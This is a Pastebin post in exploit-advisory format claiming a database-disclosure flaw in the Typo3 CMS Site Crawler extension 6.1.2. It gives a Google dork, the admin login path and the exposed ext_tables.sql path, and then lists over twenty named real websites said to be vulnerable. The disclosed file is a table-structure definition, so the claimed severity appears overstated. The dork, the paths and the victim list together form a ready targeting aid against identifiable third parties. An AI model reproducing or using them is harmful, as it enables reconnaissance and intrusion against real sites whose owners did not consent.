Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################################################
- # Exploit Title : Typo3 CMS Site Crawler Extension 6.1.2 Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 02/01/2019
- # Vendor Homepage : typo3.org
- # Software Download Link : extensions.typo3.org/extension/download/crawler/6.1.2/zip/
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 6.1.2
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/typo3conf/ext/crawler/''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- # CxSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010031
- # PacketStormSecurity Exploit Reference Link :
- packetstormsecurity.com/files/150992/Typo3-CMS-Site-Crawler-6.1.2-Database-Disclosure.html
- ################################################################################
- # Admin Panel Login Path :
- /typo3/index.php
- # Exploit :
- /typo3conf/ext/crawler/ext_tables.sql
- ################################################################################
- Information About Database =>
- ext_tables.sql
- ************************
- This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
- This file should contain a table structure dump of the tables used by the extension.
- It is used for evaluation of the database structure and is therefore important to check and update
- the database when an extension is enabled. If you add additional fields (or depend on certain fields)
- to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
- for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
- file may not necessarily be dumpable directly to MySQL (because of the semi-complete
- table definitions allowed defining only required fields.). But the EM or
- Install Tool can handle this. The only very important thing is that the syntax of the content
- is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
- ################################################################################
- # Example Vulnerable Sites =>
- [+] zbb.ch/typo3conf/ext/crawler/ext_tables.sql
- [+] assenagon.com/typo3conf/ext/crawler/ext_tables.sql
- [+] getadiy.de/typo3conf/ext/crawler/ext_tables.sql
- [+] demo.szene-rostock.de/typo3conf/ext/crawler/ext_tables.sql
- [+] 5zu3methode.de/typo3conf/ext/crawler/ext_tables.sql
- [+] espaces-transfrontaliers.org/typo3conf/ext/crawler/ext_tables.sql
- [+] lippewelle.de/typo3conf/ext/crawler/ext_tables.sql
- [+] radinfo.at/typo3conf/ext/crawler/ext_tables.sql
- [+] kanumagazin.de/typo3conf/ext/crawler/ext_tables.sql
- [+] ki.si/typo3conf/ext/crawler/ext_tables.sql
- [+] herbig.net/typo3conf/ext/crawler/ext_tables.sql
- [+] efs.b4ydev.net/typo3conf/ext/crawler/ext_tables.sql
- [+] plastipol.de/typo3conf/ext/crawler/ext_tables.sql
- [+] aegerisee-schifffahrt.ch/typo3conf/ext/crawler/ext_tables.sql
- [+] zugersee-schifffahrt.ch/typo3conf/ext/crawler/ext_tables.sql
- [+] bulac.fr/typo3conf/ext/crawler/ext_tables.sql
- [+] iholdi-oztibarre.com/typo3conf/ext/crawler/ext_tables.sql
- [+] usva.nl/typo3conf/ext/crawler/ext_tables.sql
- [+] radiosoft.com/typo3conf/ext/crawler/ext_tables.sql
- [+] maska.si/typo3conf/ext/crawler/ext_tables.sql
- [+] itd-cart.com/typo3conf/ext/crawler/ext_tables.sql
- [+] radosina.sk/typo3conf/ext/crawler/ext_tables.sql
- [+] hellweg-radio.de/typo3conf/ext/crawler/ext_tables.sql
- ################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment